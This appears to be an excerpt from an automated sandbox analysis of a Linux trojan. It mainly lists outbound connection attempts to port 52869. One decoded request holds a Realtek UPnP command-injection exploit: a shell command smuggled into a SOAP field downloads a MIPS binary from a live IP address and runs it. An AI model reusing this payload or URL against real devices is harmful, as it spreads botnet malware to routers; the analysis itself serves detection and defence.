                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.160.16.75:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.36.146.208:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.63.186.70:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.237.172.14:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.173.33.140:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.101.113.212:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.56.3.27:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.118.120.177:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.210.65.110:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.6.197.98:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.139.251.163:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.195.226.223:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.151.133.207:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.50.205.7:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.119.78.60:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.168.97.126:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.236.181.88:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.224.46.164:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.31.6.35:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.2.160.217:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.140.72.243:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.109.203.25:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.145.110.123:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.194.98.22:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.124.94.54:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.10.47.122:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.217.19.87:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.3.47.39:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.250.88.168:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.136.39.118:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.146.187.248:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.163.71.105:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.136.18.48:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.79.73.7:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.145.32.140:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.213.167.9:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.143.130.242:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.201.59.194:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.79.127.101:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.91.88.75:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.211.131.99:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.174.134.35:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.207.51.86:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.154.54.62:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.133.91.221:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.62.245.18:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.157.198.190:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.51.143.30:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.131.17.247:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.43.158.74:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.171.56.209:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.166.135.88:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.225.164.172:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.221.135.167:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.185.86.48:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.113.91.125:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.254.208.35:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.116.254.241:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.21.127.103:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.167.180.216:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.108.61.51:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.17.12.252:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.139.10.46:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.208.154.41:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.124.151.176:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.2.200.133:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.75.49.98:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.169.162.120:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.30.186.184:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.235.185.18:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.128.161.66:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.212.220.22:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.37.128.45:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.182.12.48:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.185.93.103:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.34.194.235:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.208.236.211:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.79.51.202:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.30.7.11:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.50.161.95:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.87.243.68:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.52.75.203:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.162.106.243:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.180.175.176:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.180.42.56:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.178.69.30:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.90.130.192:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.52.24.178:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.101.192.166:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.210.247.35:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.46.198.212:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.143.22.174:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.51.229.35:52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
                Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
                Source: unknownTCP traffic detected without corresponding DNS query: 40.196.250.164
                Source: unknownTCP traffic detected without corresponding DNS query: 184.139.180.158
                Source: unknownTCP traffic detected without corresponding DNS query: 12.221.185.167
                Source: unknownTCP traffic detected without corresponding DNS query: 107.140.184.143
                Source: unknownTCP traffic detected without corresponding DNS query: 176.140.75.159
                Source: unknownTCP traffic detected without corresponding DNS query: 76.191.32.70
                Source: unknownTCP traffic detected without corresponding DNS query: 135.93.126.226
                Source: unknownTCP traffic detected without corresponding DNS query: 196.237.68.241
                Source: unknownTCP traffic detected without corresponding DNS query: 17.185.223.12
                Source: unknownTCP traffic detected without corresponding DNS query: 184.60.205.115
                Source: unknownTCP traffic detected without corresponding DNS query: 52.77.49.203
                Source: unknownTCP traffic detected without corresponding DNS query: 60.183.108.60
                Source: unknownTCP traffic detected without corresponding DNS query: 173.182.43.126
                Source: unknownTCP traffic detected without corresponding DNS query: 50.230.228.27
                Source: unknownTCP traffic detected without corresponding DNS query: 180.144.131.125
                Source: unknownTCP traffic detected without corresponding DNS query: 18.133.109.224
                Source: unknownTCP traffic detected without corresponding DNS query: 39.77.116.145
                Source: unknownTCP traffic detected without corresponding DNS query: 42.98.187.116
                Source: unknownTCP traffic detected without corresponding DNS query: 132.178.63.36
                Source: unknownTCP traffic detected without corresponding DNS query: 170.137.192.177
                Source: unknownTCP traffic detected without corresponding DNS query: 116.197.182.129
                Source: unknownTCP traffic detected without corresponding DNS query: 223.41.234.144
                Source: unknownTCP traffic detected without corresponding DNS query: 142.71.113.25
                Source: unknownTCP traffic detected without corresponding DNS query: 125.203.215.184
                Source: unknownTCP traffic detected without corresponding DNS query: 87.26.151.176
                Source: unknownTCP traffic detected without corresponding DNS query: 35.20.42.141
                Source: unknownTCP traffic detected without corresponding DNS query: 212.39.9.240
                Source: unknownTCP traffic detected without corresponding DNS query: 212.73.187.192
                Source: unknownTCP traffic detected without corresponding DNS query: 201.24.148.2
                Source: unknownTCP traffic detected without corresponding DNS query: 137.203.65.53
                Source: unknownTCP traffic detected without corresponding DNS query: 74.238.88.203
                Source: unknownTCP traffic detected without corresponding DNS query: 134.78.240.86
                Source: unknownTCP traffic detected without corresponding DNS query: 129.164.197.145
                Source: unknownTCP traffic detected without corresponding DNS query: 158.106.69.226
                Source: unknownTCP traffic detected without corresponding DNS query: 140.105.127.127
                Source: unknownTCP traffic detected without corresponding DNS query: 132.56.12.112
                Source: unknownTCP traffic detected without corresponding DNS query: 162.173.181.222
                Source: unknownTCP traffic detected without corresponding DNS query: 135.49.27.136
                Source: unknownTCP traffic detected without corresponding DNS query: 61.233.198.181
                Source: unknownTCP traffic detected without corresponding DNS query: 135.2.212.129
                Source: unknownTCP traffic detected without corresponding DNS query: 96.20.230.108
                Source: unknownTCP traffic detected without corresponding DNS query: 57.105.6.30
                Source: unknownTCP traffic detected without corresponding DNS query: 18.236.184.30
                Source: unknownTCP traffic detected without corresponding DNS query: 155.116.231.227
                Source: unknownTCP traffic detected without corresponding DNS query: 106.98.29.162
                Source: unknownTCP traffic detected without corresponding DNS query: 100.209.119.102
                Source: unknownTCP traffic detected without corresponding DNS query: 203.150.118.140
                Source: unknownTCP traffic detected without corresponding DNS query: 95.89.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 223.108.9.218
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 12:27:07 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 12:27:07 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
                Source: w66OTKGVFv, 5247.1.0000000009e3a5dd.000000007387e1a1.r-x.sdmpString found in binary or memory: http://194.87.42.3/Anti_Bins/Antisocial.mips
                Source: w66OTKGVFv, 5247.1.0000000009e3a5dd.000000007387e1a1.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: w66OTKGVFv, 5247.1.0000000009e3a5dd.000000007387e1a1.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                Source: unknownHTTP traffic detected: POST /picdesc.xml HTTP/1.1Host: 127.0.0.1:52869Content-Length: 630Accept-Encoding: gzip, deflateSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMappingAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Connection: keep-aliveData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6e 69 67 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 38 37 2e 34 32 2e 33 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 20 2d 4f 20 6e 69 67 3b 20 63 68 6d 6f 64 20 37 37 37 20 6e 69 67 3b 20 2e 2f 6e 69 67 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://194.87.42.3/Anti_Bins/Antisocial.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDurati
                Source: ELF static info symbol of initial sample.symtab present: no
                Source: classification engineClassification label: mal80.troj.lin@0/0@0/0
                Source: w66OTKGVFvJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Uses known network protocols on non-standard portsShow sources
                Source: unknownNetwork traffic detected: HTTP traffic on port 33418 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57866 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50794 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42126 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42128 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57866 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50794 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57866 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33104 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33106 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50794 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 37690 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 40002 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 41432 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47268 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33104 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33106 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57866 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 40002 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 54588 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 54592 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47268 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33106 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33104 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60112 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 45084 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58766 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42844 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33086 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 45234 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42854 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33098 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 38650 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 40002 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56294 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39452 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50794 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42844 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42854 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42604 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 55076 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47268 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42844 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 45084 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42854 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 45234 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60112 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42604 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39452 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33318 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55076 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42844 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42854 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 45084 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57766 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42604 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33318 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45234 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60952 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39452 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 55076 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60112 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33106 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 48660 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56666 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33104 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57866 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 41702 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57766 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33318 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60952 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35934 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35936 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 40002 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58294 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56666 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42844 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47268 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42854 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42604 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 41702 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 54206 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57766 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 48922 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60952 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 45084 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 45234 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39056 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 55076 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39452 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33318 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56666 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58294 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48922 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 54206 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 41702 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60112 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39056 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58396 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 44310 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 48922 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35170 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35200 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35706 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60952 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57766 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33784 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33794 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58294 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40710 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39056 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 44310 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 54206 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50794 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50750 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51888 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56666 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35706 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 40710 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 44310 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42604 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42844 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42854 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50750 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51888 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 59982 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33106 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60004 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35706 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 41702 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 48922 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 45084 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33318 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40710 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51376 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57002 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57006 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51418 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39056 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 45234 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 34120 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 34166 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51888 -> 52869
